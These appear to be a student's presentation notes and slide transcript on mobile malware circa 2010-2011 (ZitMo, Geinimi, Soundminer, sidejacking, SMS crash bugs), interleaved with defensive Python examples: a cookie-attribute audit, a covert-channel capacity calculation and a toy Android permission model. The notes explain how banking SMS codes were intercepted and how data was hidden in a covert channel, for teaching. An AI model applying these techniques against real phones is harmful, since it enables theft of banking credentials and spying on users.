Cp3201 mobile security final

  • Notes
  • Attackers are no longer targeting web and email servers. Today, they are attacking enterprises from the inside out, by first compromising end user systems and then leveraging them to gain access to confidential data. Integrated functions:
  • Since the introduction of the iPhone, the smartphone market has grown over the last several years. And the introduction of tablet devices such as the Apple iPad, HP Slate and Android-based tablets signals a potential shift in which cybercriminals target end users via mobile platforms. As with other platforms, the attackers will go where the most users are, and where these users are the least protected.
  • Currently, there are more than a million mobile apps available and one billion smartphones in circulation, and there are no mandatory information security regulations in place for the application distribution channels, which puts users at risk. As devices grow more intricate and multi-faceted, they become gold mines for storing, collecting and transmitting confidential data. PDAs are not alone anymore; tablets are now also on the radar for malware. Mobile banking and NFC-enabled (online banking transaction) payments are beginning to be targeted by cybercriminals, and today’s unregulated virtual infrastructure will demand a plan of action to protect mobile devices.
  • Swap 6 and 7. Since we have
  • Summarise the cases and incidents slides. Many people are having problems with mobile viruses at this time; people are automatically getting viruses on their handsets. Several notable mobile incidents occurred in the latter half of 2010. In late September, Zeus in the mobile malware (ZitMo for short) was released to steal financial credentials (e.g., SMS one-time passwords) from Symbian and BlackBerry mobile phones. Shang will be doing further elaboration and demonstration on this attack. Trojan variants have been cropping up for Android mobile phones to generate revenue for the criminals by sending SMS/text messages; a third iteration of the “FakePlayer” SMS Trojan was released in early October. The Geinimi Android Trojan also made headlines toward the end of December; it has botnet characteristics and has been embedded within legitimate applications (particularly Chinese apps) within the Android Marketplace.
  • A new Trojan horse aimed at Android devices surfaced in China on 30 December 2010. It is named “Geinimi”. The San Francisco firm Lookout Mobile Security says the Trojan is “the most sophisticated Android malware [the firm has] seen to date.”
  • Firesheep, a Firefox plugin to conduct “sidejacking” (stealing session cookies), was released at the end of October. While not exactly mobile malware, it is a tool that is particularly useful for obtaining unauthorised access to Facebook or Google accounts that are being accessed by users on public Wi-Fi hotspots. Laptops, iPads and mobile phones accessing the web from a coffee shop (Wi-Fi hotspot) can leak session cookies to anyone listening on the network. These session cookies are then replayed by the attacker to gain access to the victim’s accounts. Firesheep -> counter: FireShepherd (defence); it will scan for Firesheep and flood it back.
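The defence a practitioner wants against the sidejacking described above is to keep the session cookie off plaintext HTTP in the first place: a cookie marked Secure is never sent over HTTP, so there is nothing for a listener on the hotspot to capture, and HSTS keeps the browser on HTTPS. The script below is an added example written for these notes (not Firesheep, FireShepherd or any site's code); it parses constructed HTTP response headers and reports session cookies that lack Secure, HttpOnly or SameSite and responses that lack Strict-Transport-Security. The sample responses and cookie names are made up.

```python
"""Audit Set-Cookie headers for the attributes that blunt cookie sidejacking.

Added example for these notes, not code from the original slides.
The two responses below are constructed: one as a site that leaks its
session cookie over plain HTTP, one hardened.
"""
from typing import Dict, List, Tuple

WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=abc123; Path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Substrings that suggest a cookie carries a login session (assumed heuristic).
SESSION_NAME_HINTS = ("session", "sid", "auth", "token")


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP response into (name, value) pairs; duplicates are kept."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs: List[Tuple[str, str]] = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def parse_set_cookie(value: str) -> Tuple[str, Dict[str, str]]:
    """Return (cookie_name, attributes); attribute names are lower-cased."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if "=" in part:
            key, val = part.split("=", 1)
            attrs[key.strip().lower()] = val.strip()
        else:
            attrs[part.lower()] = ""
    return name, attrs


def audit_cookies(raw: str) -> List[str]:
    """One finding per weakness that makes a captured cookie replayable."""
    findings: List[str] = []
    headers = parse_headers(raw)
    has_hsts = any(name == "strict-transport-security" for name, _ in headers)
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        session_like = any(h in cookie.lower() for h in SESSION_NAME_HINTS)
        if "secure" not in attrs:
            findings.append(f"{cookie}: missing Secure (sent over plain HTTP, capturable on open Wi-Fi)")
        if "httponly" not in attrs:
            findings.append(f"{cookie}: missing HttpOnly (readable by injected script)")
        if session_like and "samesite" not in attrs:
            findings.append(f"{cookie}: missing SameSite on a session cookie")
    if not has_hsts:
        findings.append("response: no Strict-Transport-Security header, browser may fall back to HTTP")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_cookies(resp) or ["no findings"])
```

Run against a real site, the same checks apply to the `Set-Cookie` lines of a captured response; the heuristic for "session-like" names is a starting point, not a standard.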
  • Source: http://www.youtube.com/watch?v=uCyKcoDaofg&feature=related (5 min 12 sec). 13 Investigates explains how your cell phone can be secretly hijacked and used against you, and how to protect yourself. ALSO SEE OUR STORY HERE: http://www.wthr.com/Global/story.asp?S=9346833
  • Good to use the story to make a point
  • Can condense the threat slides
  • Experts predict that denial of service will also continue to be a significant threat to VoIP. If a large number of VoIP phones become infected by malware and flood a network with traffic, the results could be extremely disruptive. Some cyber criminals are expected to attempt to blackmail carriers based on a DoS attack scenario.
  • “Most people have been trained to enter social security numbers, credit card numbers, bank account numbers, etc. over the phone while interacting with voice response systems,” “Criminals will exploit this social conditioning to perpetrate voice phishing and identity theft. At the same time, customers will demand better availability from phone service than they would from an ISP, so the threat of a DoS attack might compel carriers to pay out on a blackmail scam.”
  • Put at the end if you have the time: http://www.youtube.com/watch?v=XlTEIYGk3Ro&feature=related (2 min 33 sec). It needs a program called “Super Bluetooth Hack”. With the program you can do things on the other phone such as: read SMS messages, read contacts, change the profile, play a ringtone (even if the phone is on silent), play songs, restart the phone, turn off the phone, restore factory settings, change the ringing volume, and call from the other phone (it includes all call functions like hold etc.).
  • 27C3 presentation claims many mobiles are vulnerable to SMS attacks. The “SMS of death” threatens to disable many current Sony Ericsson, Samsung, Motorola, Micromax and LG mobiles. Security researchers at TU Berlin claimed that sending malicious text or MMS messages represents a relatively simple means of crashing current mobile phones. Some of the bugs discovered have the potential to cause problems for entire mobile networks. In recent months, the tendency has been for hackers and security testers to focus their efforts on smartphones such as the iPhone or Android-based phones. Most people are still using feature phones, which only run Java-based apps. Texting is always supported, as are, usually, additional functions such as the ability to have messages displayed immediately by means of flash texts, to attach a digital business card, to address various ports and to send texts in more than one part. All of these functions are prone to bugs. http://www.h-online.com/security/news/item/27C3-presentation-claims-many-mobiles-vulnerable-to-SMS-attacks-1159568.html
  • iPhone SMS Attack to Be Unleashed at Black Hat: http://www.pcworld.com/businesscenter/article/169245/iphone_sms_attack_to_be_unleashed_at_black_hat.html. A series of malicious SMS messages is a way to crash the iPhone via SMS, and he thought that the crash could ultimately lead to working attack code. SMS is emerging as a promising area of security research, as security researchers use the powerful computing capabilities of the iPhone and Google’s Android to take a closer look at the way it works on mobile networks.
  • Good SMS sent out. Hacker intercepts the SMS. Malicious SMS will be received by the intended receiver. Receiver’s phone is infected and the payload is deployed in the name of the sender. Because GSM encryption/3G can already be cracked -> http://www.neowin.net/search/news?terms=gsm+cracked
  • Source: http://www.youtube.com/watch?v=uCyKcoDaofg&feature=related. Story of how your cell phone can be secretly hijacked and used against you. Just a // SEE OUR STORY HERE: http://www.wthr.com/Global/story.asp?S=9346833. The solution lies in software called WaveSecure; you may remember there being a mobile security seminar where the presenter talked about the software being able to “lock and wipe”, “backup and restore” and “locate and track your SIM”.
  • Like computer viruses, smartphones are being “attacked” by malicious software which could severely threaten both the users and the usefulness of the phone. We will be exploring some common malware in detail to show you what they can do. Cabir: infects mobile phones running Symbian OS. When a phone is infected, the message ‘Caribe’ is displayed on the phone’s screen every time the phone is turned on. The worm then attempts to spread to other phones in the area over Bluetooth.
  • Skulls: a Trojan horse. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also renders all phone applications, including SMS and MMS, useless.
  • Comwar: the first worm to use MMS messages to spread to other devices. Thankfully, it is limited to infecting devices running Symbian Series 60. It can spread through Bluetooth too. The executable worm file, once launched, hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices. Mobile device users have given rise to a market for third-party applications (such as games and other mobile applications) and with it opened up opportunities for malicious use through web downloads too.
    ZeuS Mitmo, from http://leonardomusumeci.net/tag/zeus/?lang=en and http://www.eweekeurope.co.uk/news/bank-site-sms-passcodes-intercepted-by-zeus-trojan-variant-21818: Stealing the username or the password is relatively easy, and malware like ZeuS has been doing that for ages (injecting HTML or adding fields using JavaScript works like a charm). But now the Trojan will also ask for new details: our mobile vendor, model, and phone number (the website will force you to fill in this information due to its “new security measures”).
  • Disclaimer: We’re not mobile security experts, please do not fault us if we misunderstand any concepts. Unfortunately, this section may also be a little boring to those who are unable to understand this. So we’ll be looking at 3 types of malware: 2 of them, ZeuS and Geinimi, were in the news, and 1 is a research-based data theft mobile malware called Soundminer.
  • Both ZeuS and Geinimi were called the “most interesting mobile threats” on CNET in an article published in late 2010.
  • Source: http://www.youtube.com/watch?v=P0J2FSB8OSA
  • Geinimi is a Trojan affecting Android devices, emerging through third-party application sources (markets and app-sharing forums), primarily in China. Geinimi is noteworthy as it represents a reasonable jump in capabilities and sophistication over existing Android malware observed to date. The word Geinimi (Ghay-knee-mē) is derived from the name of the first repackaged application it was discovered in. Geinimi is Mandarin Chinese for “give you rice”, essentially slang for “give you money”. The Trojan was originally injected using the package “com.geinimi”, but as it spread, subsequent variants took on an obfuscated package scheme. It has the ability to steal your personal data and send it to a remote computer, as well as take commands from a remote server, which would effectively turn your Android device into a zombie inside a botnet. This Trojan can also:
    * Read and collect SMS messages
    * Send and delete selected SMS messages
    * Pull all contact information and send it to a remote server (number, name, the time they were last contacted)
    * Place a phone call
    * Silently download files
    * Launch a web browser with a specific URL
    The detailed description of everything Geinimi can do sounds scary: it can send your location, device identifiers (IMEI and IMSI) and list of installed apps to someone. It can also download an app and prompt the user to install it. While the intent is still undetermined, Geinimi is clearly well equipped to perform malicious activities without a user’s knowledge.
    Sources:
    http://www.nsai.it/tag/geinimi-trojan-technical-analysis/
    http://blog.mylookout.com/2011/01/geinimi-trojan-technical-analysis/
    http://www.smart-internet.com/blog/2010/12/30/advanced-trojan-could-zombify-your-android-device/
    Other sources:
    http://www.androidet.com/security-firm-lookout-dissects-the-geinimi-trojan/
    http://www.androidet.com/lookout-warning-new-trojan-affecting-android/
    http://www.androidet.com/lookout-mobile-security-analyzes-that-super-evil-geinimi-trojan/
    http://nakedsecurity.sophos.com/2010/12/31/geinimi-android-trojan-horse-discovered/
    Android Phones Hit With A Trojan Virus: http://www.youtube.com/watch?v=fkSEX4Apgfk
  • What does ZeuS do? In late September 2010, specialists at S21Sec detected a malicious program capable of forwarding incoming text messages to a specific number. At first, it appeared to be of no particular interest. However, it turned out that this threat was, first of all, connected to the well-known Zbot (ZeuS) Trojan, and furthermore, malicious users weren’t interested in all of the text messages, just the ones that contained authentication codes for online banking transactions. Kaspersky Lab labeled this threat Trojan-Spy.SymbOS.Zbot.a.
    The attack was set up as follows:
    Zbot steals online banking access data from an infected computer.
    After confirming the victim’s telephone number, the malicious user sends a text message with a link to a malicious program for smartphones.
    When a user clicks on the malicious link, they are asked to download an app and can either install it, which launches the Trojan, or decline it.
    The malicious user then attempts to conduct a transaction via online banking services that require text message confirmation.
    The bank sends a text message with the authentication code to the victim’s phone number.
    The malicious program then forwards the incoming message to the malicious user’s phone number.
    The malicious user obtains the authentication code and completes the online banking transaction.
    This malicious program also had a legitimate digital signature. Such a complex plan of attack just goes to show that malicious users are constantly broadening their interests. Prior to the detection of this particular threat, text message authentication was one of the last reliable means of protection when conducting banking transactions on the Internet. Now, malicious users have found a way to bypass even this level of security.
    The Mitmo Zeus Trojan has infected phones to intercept login SMS credentials and access bank accounts. Source: http://www.eweekeurope.co.uk/news/bank-site-sms-passcodes-intercepted-by-zeus-trojan-variant-21818
    Malware authors are already a step ahead with new tricks as more banks and organisations move towards two-factor authentication to secure their web sites. A mobile variant of the Zeus banking Trojan is targeting ING customers in Poland by intercepting one-time passcodes sent to customer phones via SMS, according to F-Secure. It appears to be the same style of attack as the one discovered by S21sec in September, F-Secure said. The actual analysis of the variant, Zeus in the Mobile (ZitMo), was performed by security consultant Piotr Konieczny on his personal site. Konieczny said customers of Polish bank mBank were also targeted.
    Clunky But Proves The Concept
    Mitmo is fairly clunky in its execution, as it requires the user to first download an application to their phone, but attackers are tricking users into thinking it is a critical software update to keep the ability to receive more SMS alerts, Konieczny said. It can affect Symbian and BlackBerry devices, said Konieczny, and it was also likely to target Windows Mobile devices, according to Denis Maslennikov, a malware researcher at Kaspersky Lab. The research did not mention Android or iPhones. Apple’s iPhone and other iOS devices may be safe because rogue apps cannot install unless the device has been jailbroken.
    Considered by security experts to be one of the most sophisticated Trojans, Zeus originally targeted financial institutions by using keyloggers to steal users’ login credentials as they were entered on banking sites. Many banks switched to two-factor authentication to thwart the Trojan, since the one-time passcodes that authorise transactions expire as soon as they are used. Mitmo intercepts the one-time passcodes before they can be used.
    The most common two-factor authentication method involves sending out mTANs, mobile transaction authentication numbers, via SMS message as a one-time passcode for customers to enter on the web site. Two-factor authentication combines something the user knows, the password, with something the user has, the phone that receives the SMS message, to tighten security. Google recently rolled out similar two-factor authentication for Gmail based on one-time passwords.
    The two-pronged attack begins when Mitmo infects a user’s computer, whether from a spam link, drive-by download, or some other method, according to Konieczny. When the user then browses to a bank web site, such as ING, users are shown a “security notification” to update their phone so that it can receive the SMS codes, Konieczny said. The update process asks for the mobile phone number and type of mobile device, he said. The Trojan injects HTML fields into the web site, so there are no changes to the URL nor any changes to the header and footer of the page to hint that the security panel may not be legitimate, he said. Users do not realise the notification is not real and think they are enhancing their security by providing the information.
    Once the attackers have the information, they send an SMS to the user with a link to some other web site which downloads an app to the device. The app is claimed to be part of the security update so that users would be able to receive the passcodes. Once installed, the mobile app intercepts all SMS sent to the phone and forwards them to another phone number, giving the attacker access to the user’s bank information and any other site that sends information to the mobile device. Mitmo dials back to the same command and control server based out of Great Britain, according to Maslennikov. ING Poland said in an email statement that none of the customers’ accounts have been compromised by Mitmo at this time.
  • SymbOS/Zitmo.A is a mobile spyware application used to intercept and forward the mTAN SMS messages sent from an infected user’s bank to an attacker. It was implemented by the Zeus Trojan for gathering information from victims (= Data theft) about their mobile phones so that it could send a targeted download link to them. The attacker could then change what numbers were monitored by the spyware to go after specific banks. This particular group of crooks was using SymbOS/Zitmo.A in a targeted attack against Spanish banks.
  • Source:http://www.computersecurityarticles.info/antivirus/mcafee/write-once-mobile-malware-anywhere/
  • The attacker steals both the online username and password using malware (ZeuS 2.x). The attacker infects the user’s mobile device by forcing him to install a malicious application (he sends an SMS with a link to the malicious mobile application). ZeuS Mitmo, from http://leonardomusumeci.net/tag/zeus/?lang=en
  • The application that the user installs on his mobile device is a simple application that monitors all incoming SMS and installs a backdoor to receive commands via SMS. The technique that the malicious application uses for monitoring incoming SMS without notifying the user is not something advanced (it uses the Symbian API), but it allows the Trojan to use the SMS stack for its own profit without showing any SMS on the mobile screen:
    The attacker logs in with the stolen credentials, using the user’s computer as a SOCKS proxy, and performs a specific operation that needs SMS authentication.
    An SMS is sent to the user’s mobile device with the authentication code. The malicious software running on the device forwards the SMS to another terminal controlled by the attacker.
    The attacker fills in the authentication code and completes the operation.
  • OK, now that I’m done buying time, let’s wake up to watch Soundminer in action: http://www.youtube.com/watch?v=Z8ASb-tQVpU
  • Researchers have developed a low-profile Trojan horse program for Google’s Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software. The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone’s keypad, according to the study. Source: http://gigasite.wordpress.com/category/software/. Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said. “We implemented Soundminer on an Android phone and evaluated our technique using realistic phone conversation data,” they wrote. “Our study shows that an individual’s credit card number can be reliably identified and stealthily disclosed. Therefore, the threat of such an attack is real.”
  • Soundminer is designed to ask for as few permissions as possible to avoid suspicion. For example, Soundminer may be allowed access to the phone’s microphone, but further access to transmit data, intercept outgoing phone calls and access contact lists might look suspicious. So in another version of the attack, the researchers paired Soundminer with a separate Trojan, called Deliverer, which is responsible for sending the information collected by Soundminer. Since Android could prevent that communication between applications, the researchers investigated a stealthy way for Soundminer to communicate with Deliverer. They found what they term several “covert channels”, where changes in a feature, such as vibration settings, are communicated to other interested applications. http://gigasite.wordpress.com/category/software/
  • Using the covert channel of vibration settings, Soundminer could encode its sensitive data in a form that looks like a vibration setting but is actually the sensitive data, which Deliverer could decode and then send to a remote server. That covert vibration-settings channel only has 87 bits of bandwidth, but that is enough to send a credit card number, which is just 54 bits, they wrote. If it is installed on a device, users are likely to approve of the settings that Soundminer is allowed to use, such as the phone’s microphone. Since Soundminer doesn’t directly need network access, due to its use of a covert side channel to send its information, it is unlikely to raise suspicion. In fact, two antivirus programs for Android, VirusGuard from SMobile Systems and Droid Security’s AntiVirus, both failed to identify Soundminer as malware even when it was recording and uploading data, according to the researchers. In an e-mail statement, Google officials in London did not directly address Soundminer but said that Android is designed to minimize the impact of “poorly programmed or malicious applications if they appear on a device.” “If users believe an application is harmful or inappropriate, they can flag it, give it a low rating, leave a detailed comment, and of course, remove it from their device,” Google said. “Applications deemed to be in violation of our policies are removed from Market, and abusive developers can also be blocked from using the Android Market for repeated or egregious violations of our policies.” http://gigasite.wordpress.com/category/software/
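The 87-bit and 54-bit figures above are worth checking, because they explain why the researchers could treat a setting with almost no bandwidth as a usable channel: a 16-digit number packed as a binary integer needs only ceil(log2(10^16)) = 54 bits, whereas the same digits as 8-bit text would need 128 and would not fit. The script below is a worked calculation added for these notes (not the researchers' code); the 16-digit card length and the leading-zero round trip are assumptions made to show the arithmetic, and the only page-supplied numbers are 87 and 54.

```python
"""Capacity check for the vibration-settings covert channel described above.

Added example for these notes, not code from the Soundminer paper.
Shows where the "54 bits for a credit card number" figure comes from and
how much of the stated 87-bit channel it uses.
"""

CHANNEL_BITS = 87   # capacity stated in the notes
CARD_DIGITS = 16    # length of a typical card number (assumed)


def bits_for_digits(n_digits: int) -> int:
    """Smallest bit width that holds every n-digit decimal value.

    Exact integer arithmetic: the largest n-digit value is 10**n - 1, and
    its bit_length() is ceil(log2(10**n)) without floating-point rounding.
    """
    return (10 ** n_digits - 1).bit_length()


def ascii_bits(n_digits: int) -> int:
    """Width of the same digits sent as 8-bit characters, for comparison."""
    return 8 * n_digits


def max_digits_in(channel_bits: int) -> int:
    """Most decimal digits whose packed form fits in channel_bits bits."""
    n = 0
    while bits_for_digits(n + 1) <= channel_bits:
        n += 1
    return n


def pack_digits(digits: str) -> int:
    """Pack a digit string into an integer; leading zeros are restored by unpack_digits."""
    if not digits.isdigit():
        raise ValueError("digits only")
    return int(digits)


def unpack_digits(value: int, n_digits: int) -> str:
    """Inverse of pack_digits for a fixed-width field (keeps leading zeros)."""
    return str(value).zfill(n_digits)


def summary() -> dict:
    """The numbers the notes quote, recomputed."""
    packed = bits_for_digits(CARD_DIGITS)
    return {
        "packed_bits": packed,                                  # 54
        "ascii_bits": ascii_bits(CARD_DIGITS),                  # 128
        "fits_packed": packed <= CHANNEL_BITS,                  # True
        "fits_ascii": ascii_bits(CARD_DIGITS) <= CHANNEL_BITS,  # False
        "max_digits": max_digits_in(CHANNEL_BITS),              # 26
    }


if __name__ == "__main__":
    for key, val in summary().items():
        print(f"{key}: {val}")
```

The detection lesson is the reverse of the arithmetic: a channel does not need much bandwidth to leak a short secret, so a permission review that only asks "does this app have network access?" misses an app that has none but shares a device with one that does.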
  • So now that we know much more about how mobile attacks work, let’s look at the security models that the organisations which built these systems provide.
  • The security of iOS is really provided by the lack of application choice. All applications are supposed to be loaded from the Apple App Store, and Apple uses human review, static and dynamic analysis to look for potentially malicious actions by uploaded apps. You are not allowed to sideload applications from the Internet or your PC, so in theory every bit of executable code your phone is exposed to has passed by Apple’s gatekeepers. In reality, mobile Safari has had hundreds of vulnerabilities and the sandbox mechanism is regularly defeated, as evidenced by the success of enthusiasts in creating jailbreak software for pretty much every version of iOS. Android was always intended to allow users to load software from untrusted sources, so the security model needed to be “collapsed” onto the phone and can’t rely on external review processes.
    A non-jailbroken phone includes runtime Code Signing Enforcement, which makes exploitation of memory corruption vulnerabilities significantly more difficult, as you cannot execute injected code. This is a significantly stronger defense than the non-executable memory protections on other systems (e.g. DEP, NX/XD, PaX PAGEEXEC). It is always possible to achieve the same effects using return-oriented programming, but it is significantly more labor intensive (especially if you need to do loops or conditionals). On Android, you may simply execute the injected shellcode that the exploit has sprayed onto the heap. Given that both Android and iOS use the same WebKit library for their browsers, developing the exploit against iOS will take at least an order of magnitude longer than developing the exploit against Android for the same vulnerability. In both cases, the attacker will likely also have to exploit a kernel vulnerability in order to escalate privileges and modify the device. Since they also have roughly the same market share currently, the rational attacker will attack the platform that provides the greatest return on their time investment.
    From Quora discussion: http://www.quora.com/Which-platform-is-more-vulnerable-to-viruses-iOS-or-Android
  • iOS runs all applications as the same user, and utilizes a kernel-level mandatory access control mechanism known as “SeatBelt” to limit interaction between applications. While SeatBelt policies could, in theory, be customized for each downloaded application, in practice customization is only used for a handful of pre-loaded apps (like mobile Safari) and all downloaded apps run with the same set of permissions. This set of permissions is not visible to users, and the standard SeatBelt policy has actually become more permissive as the platform has evolved, with iOS 4 granting many more rights than iPhone OS 2.
    Because of the freedom Google gives to the Android market, Android’s security model needs to be “collapsed” onto the phone and can’t rely on external review processes, which are non-existent in this case. Every application on Android is assigned its own uid on install, and by default the application’s user is granted no rights outside of access to its home directory, the ability to execute itself and write to the screen. Android applications request permissions to perform other actions, like access the network, use the Bluetooth stack, make phone calls or read the user’s contacts. The user needs to approve these permissions on install, and a lot of work has gone into designing a UX that makes this decision easier to understand while not “lying” to the user. A handful of these permissions are enforced in the Linux kernel by use of group membership by each app’s user, but the majority of them are enforced on IPC calls between the application and the services that provide these abilities.
    From Quora discussion: http://www.quora.com/Which-platform-is-more-vulnerable-to-viruses-iOS-or-Android
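The two enforcement points in the Android description above (a few permissions mapped onto Linux group membership and checked by the kernel, the rest checked by the receiving service on the IPC call) are easiest to see in a small model. The Python below is an illustration added for these notes, not Android source code: it assigns each installed app its own uid, records install-time grants, and then runs four requests through the kernel-side and service-side checks. The package names, the mapping of INTERNET and BLUETOOTH to the `inet` and `net_bt` groups, and the contact data are constructed for the example.

```python
"""Toy model of the Android permission model described in the notes.

Added illustration for these notes; not Android's own code.  Each app gets
its own uid; permissions are granted only at install time; INTERNET and
BLUETOOTH (assumed examples of the "handful") are enforced by the kernel via
supplementary groups, READ_CONTACTS by the service that receives the IPC.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set


class SecurityException(Exception):
    """Stands in for Android's SecurityException / the kernel's EACCES."""


# Constructed mapping of kernel-enforced permissions to Linux groups.
KERNEL_GROUP_FOR = {"INTERNET": "inet", "BLUETOOTH": "net_bt"}


@dataclass
class InstalledApp:
    package: str
    uid: int                     # unique per app, assigned at install
    permissions: Set[str]        # install-time grants, fixed afterwards
    groups: Set[str] = field(default_factory=set)


class PackageManager:
    """Assigns uids and records the all-or-nothing install-time grant."""

    def __init__(self, first_uid: int = 10000):
        self.next_uid = first_uid
        self.by_uid: Dict[int, InstalledApp] = {}

    def install(self, package: str, requested: Set[str], user_approved: bool) -> InstalledApp:
        if not user_approved:
            raise SecurityException(f"{package}: user declined the requested permissions")
        groups = {KERNEL_GROUP_FOR[p] for p in requested if p in KERNEL_GROUP_FOR}
        app = InstalledApp(package, self.next_uid, set(requested), groups)
        self.next_uid += 1
        self.by_uid[app.uid] = app
        return app

    def check_permission(self, uid: int, permission: str) -> bool:
        """What a system service asks before serving an IPC request."""
        app = self.by_uid.get(uid)
        return app is not None and permission in app.permissions


class Kernel:
    """Kernel-side enforcement: group membership for sockets, uid ownership for files."""

    def open_socket(self, app: InstalledApp) -> str:
        if "inet" not in app.groups:
            raise SecurityException(f"uid {app.uid}: EACCES, not a member of group inet")
        return f"socket owned by uid {app.uid}"

    def read_home_dir(self, reader: InstalledApp, owner: InstalledApp) -> str:
        # Each app's home directory is owned by its own uid with no world access.
        if reader.uid != owner.uid:
            raise SecurityException(f"uid {reader.uid}: EACCES on /data/data/{owner.package}")
        return f"/data/data/{owner.package}"


class ContactsService:
    """A framework service enforcing READ_CONTACTS at the IPC boundary."""

    def __init__(self, pm: PackageManager):
        self.pm = pm
        self.contacts = ["Alice", "Bob"]  # constructed sample data

    def query(self, caller_uid: int) -> List[str]:
        if not self.pm.check_permission(caller_uid, "READ_CONTACTS"):
            raise SecurityException(f"uid {caller_uid}: READ_CONTACTS denied")
        return list(self.contacts)


def demo() -> Dict[str, str]:
    """Run four requests through the checks and report each outcome."""
    pm, kernel = PackageManager(), Kernel()
    contacts = ContactsService(pm)
    game = pm.install("com.example.game", {"INTERNET"}, user_approved=True)
    recorder = pm.install("com.example.recorder", {"RECORD_AUDIO"}, user_approved=True)
    requests: List[tuple] = [
        ("game opens socket", lambda: kernel.open_socket(game)),
        ("recorder opens socket", lambda: kernel.open_socket(recorder)),
        ("game reads recorder's files", lambda: kernel.read_home_dir(game, recorder)),
        ("game reads contacts", lambda: str(contacts.query(game.uid))),
    ]
    results: Dict[str, str] = {}
    for label, action in requests:
        try:
            results[label] = "allowed: " + action()
        except SecurityException as exc:
            results[label] = "denied: " + str(exc)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label}: {outcome}")
```

The recorder app in the demo holds only RECORD_AUDIO, so the kernel refuses its socket; that is the check Soundminer sidesteps by handing data to a second app rather than opening a socket itself.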
  • It is more likely that an Android phone will be exposed to malicious software than a non-jailbroken iPhone, which benefits from Apple’s rigorous screening processes, because the Android market is not as controlled and the user can download applications whenever he/she pleases. If you were trying to attack a fully patched Android phone and a fully patched iPhone, then the iPhone is probably the softer target, especially if you can get the user to navigate to a malicious page using Safari. In this way, Android and iOS play out the Windows/OS X security drama in miniature and reflect the difference between security and safety. The former OSes are like very secure homes in bad neighborhoods; the Apple OSes are like mansions with unlocked front doors in much safer neighborhoods.
    iOS takes on the “Prevention is better than cure” philosophy, like a “kiasu”, overly concerned parent of a very young baby. Android’s security model is more catered to geeks as a whole; it is like a parent of a teenager, giving them the freedom to make their own choices and mistakes.
    From Quora discussion: http://www.quora.com/Which-platform-is-more-vulnerable-to-viruses-iOS-or-Android
  • Trend Micro releases Android security app, says iOS is more secure http://www.techspot.com/news/41951-trend-micro-releases-android-security-app-says-ios-is-more-secure.html
  • http://adtmag.com/articles/2011/03/03/android-attacks-on-rise.aspx?utm_source=2359_Media&utm_campaign=86404dbd86-Daily_Newsletter_0703111&utm_medium=email
    http://www.zdnet.com/blog/btl/googles-android-wears-big-bulls-eye-for-mobile-malware/45733
    http://www.appleinsider.com/articles/10/07/29/millions_of_android_users_hit_by_malicious_data_theft_app.html
  • But having said all this, going back to the iPhone vs Android security model: you must understand that implementing mobile security solutions is a delicate balance between making restrictions and keeping platforms open. Will Android still:
    Allow self-signed apps?
    Allow non-official app repositories?
    Allow free interaction between apps?
    ***And also Google must consider the consequences, as many Android users chose this platform because of the freedom it gives its users.
    Allow users to override security settings?
    Allow users to modify system/firmware?
  • Do not use any virus-infected system or device infected with malware for exchanging data… it’ll only make things worse… of course, that’s if you know it’s infected.
    After using Bluetooth, de-activate your Bluetooth instantly. Don’t leave it on and bring it wherever you go!
    De-activate your infrared function. Don’t leave it on and bring it wherever you go!
    When you register on some sites, those sites send a confirmation or verification to your mobile phone. Always check whether the site is safe before clicking OK.
    While saving data, check it with antivirus software.
    Ignore SMS if you don’t know the sender.
    Use mobile antivirus.
  • Some future attack concerns -> just a tribute to my bro there, the guys Justin, Jun Ming and Jeremy who suggested this. During a mobile firmware update, could the virus be installed already in the firmware? This means that the firmware which people load onto the phone would already have a “preloaded” virus. Crackers could hack the source servers of the Google Android system or iPhone system, or use a man-in-mobile attack.
  • Transcript

    • 1. Ong Howe Shang
      KohJyeYiing
      Mobile Security - Malware
    • 2. Agenda
      Current Trends
      Threats:
      Denial of Service to VoIP
      Bluetooth Hacking
      SMS viruses
      Man-in-mobile attacks
      Mobile eavesdropping
      Data Theft
      Mobile Viruses:
      Soundminer
      Zeus
      Geinimi
      Solutions
    • 3. Current Trends
      Increasing number of mobile phone user-base
      Capabilities of smart phones
      mCommerce
      Mobile vouchers, coupons and loyalty cards
      Mobile marketing and advertising
      Mobile Browsing
      mWallets
      mobile identity
    • 4. Current Trends
      Growth of smartphone market:
      Source taken from M86 Security Labs: Threat Predictions 2011
    • 5. Current Trends
      More than a million mobile apps available and one billion smartphones in circulation
      No mandatory information security regulations
      Factors for the increase in mobile malware:
      Mobile devices becoming gold mines for storing, collecting and transmitting confidential data.
      Mobile banking and NFC-enabled payments (online banking transactions) are beginning to be targeted by cybercriminals
    • 6. Current Trends
      Growth of mobile malware:
      Source taken from Malware Goes Mobile, November 2006
    • 7. Cases and Incidents
      Case 1:
      In late September 2010, a mobile component of ZeuS was released to steal financial credentials. It infects the mobile device and sniffs all SMS messages
      Case 2:
      On 4 October 2010, a third iteration of the "FakePlayer" SMS Trojan was released for Android phones.
    • 8. Cases and Incidents
      Case 3:
    • 9. Cases and Incidents
      Case 4:
